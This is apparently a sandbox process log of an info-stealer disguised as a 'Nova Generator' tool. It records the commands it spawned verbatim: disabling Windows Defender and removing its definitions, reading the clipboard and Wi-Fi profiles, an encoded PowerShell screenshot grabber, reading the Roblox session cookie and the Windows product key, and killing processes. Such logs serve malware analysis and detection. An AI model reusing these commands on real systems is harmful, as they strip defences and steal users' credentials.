"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:1932

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E4
1⤵
PID:3900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:396

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3928

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Nova_Gen\" -spe -an -ai#7zMap16879:78:7zEvent12505
1⤵
- Suspicious use of FindShellTrayWindow
PID:4644

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe"
1⤵
- Executes dropped EXE
PID:4720

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\NovaGen.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Nova.exe
3⤵
PID:4020

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
Nova.exe
4⤵
- Executes dropped EXE
PID:4696

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
Nova.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'"
6⤵
PID:4340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
6⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
PID:4460

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
PID:3392

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
6⤵
PID:4604

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
7⤵
PID:5152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
6⤵
PID:1472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
PID:5036

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
PID:5544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:344

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
6⤵
PID:4628

C:\Windows\system32\netsh.exe
netsh wlan show profile
7⤵
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
6⤵
PID:5140

C:\Windows\system32\systeminfo.exe
systeminfo
7⤵
- Gathers system information
PID:5672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
6⤵
PID:5196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5728

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pzde0rda\pzde0rda.cmdline"
8⤵
PID:6048

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE8.tmp" "c:\Users\Admin\AppData\Local\Temp\pzde0rda\CSC1FFFE9FDE6034B84A974B0EB875D273B.TMP"
9⤵
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:5656

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:5872

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:5980

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:6056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:6076

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:5180

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4584"
6⤵
PID:5484

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4584
7⤵
- Kills process with taskkill
PID:224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
6⤵
PID:5608

C:\Windows\system32\taskkill.exe
taskkill /F /PID 400
7⤵
- Kills process with taskkill
PID:5500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2464"
6⤵
PID:672

C:\Windows\system32\taskkill.exe
taskkill /F /PID 2464
7⤵
- Kills process with taskkill
PID:5808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"
6⤵
PID:5748

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5072
7⤵
- Kills process with taskkill
PID:5720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3040"
6⤵
PID:5880

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5872

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3040
7⤵
- Kills process with taskkill
PID:5224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"
6⤵
PID:5904

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5056
7⤵
- Kills process with taskkill
PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3088"
6⤵
PID:4548

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3088
7⤵
- Kills process with taskkill
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4928"
6⤵
PID:4628

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4928
7⤵
- Kills process with taskkill
PID:6084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4964"
6⤵
PID:5256

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4964
7⤵
- Kills process with taskkill
PID:2592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5028"
6⤵
PID:5280

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5028
7⤵
- Kills process with taskkill
PID:5248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
6⤵
PID:2520

C:\Windows\system32\getmac.exe
getmac
7⤵
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
6⤵
PID:3656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
6⤵
PID:5828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
6⤵
PID:440

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
7⤵
PID:796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
6⤵
PID:5784

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
7⤵
PID:5832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
6⤵
PID:3700

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
7⤵
PID:1040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
6⤵
PID:4592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
6⤵
PID:5620

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Detects videocard installed
PID:5496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
6⤵
PID:5936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:5848

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3944

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:3228

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3848

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Info.txt
1⤵
PID:5868

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:1948

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:5676

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
1⤵
- Executes dropped EXE
PID:5312

C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe
"C:\Users\Admin\Downloads\Nova_Gen\Nova-Generator\Nova.exe"
2⤵
- Executes dropped EXE
PID:5356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8a19fab58,0x7ff8a19fab68,0x7ff8a19fab78
2⤵
PID:3208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:2
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:3016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1924,i,11196434712704794234,577915225821929875,131072 /prefetch:8
2⤵
PID:3196

C:\Program Files\Google\Chrome\Application\chrome.exe
